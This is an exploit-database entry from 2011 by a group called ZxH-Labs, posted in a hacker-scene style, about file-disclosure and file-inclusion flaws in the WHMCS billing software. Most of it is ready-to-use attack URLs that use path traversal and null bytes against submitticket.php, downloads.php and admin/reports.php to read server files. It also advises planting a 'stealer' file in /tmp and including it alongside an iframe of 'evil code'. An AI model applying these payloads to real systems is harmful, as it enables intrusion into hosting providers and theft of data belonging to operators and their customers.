WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities

ID 1337DAY-ID-17053
Type zdt
Reporter ZxH-Labs
Modified 2011-11-06T00:00:00


Exploit for php platform in category web applications

                                            $b0x#  WHMCS ( WHMCompleteSolution )  3.x / 4.x  Multiple Vulnerability !
$b0x#  ZxH-Labs
$b0x#  1st-NOV-11
$b0x#  Www.Sec4ever.coM
$b0x#  WH-03 On Windows IIS 6.0
[email protected]:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
[email protected]:/b0x/Exploits/WebAPP# cat WH-03.XPL
EXPL Type : Local File Disclosure
Files : Submitticket.php , Downloads.php
       -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
             EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00
       ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
            EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00
[email protected]:/b0x/Exploits/WebAPP#
[email protected]:/b0x/Exploits/WebAPP#  cat WH-03.bug
Bug TYPE : Local File Include
Bug File : Reports.php
             -I : reports.php?report=[LFI]%00
                EX : admin/reports.php?report=../../../../../../../boot.ini%00
               You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
            However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
                  -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
              And Don't Forget To Use IFRAME With Evil Code'z =))
[email protected]:/b0x/Exploits/WebAPP# Logout
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever |  TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN  | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3  And All Q8'z

#  0day.today [2018-04-04]  #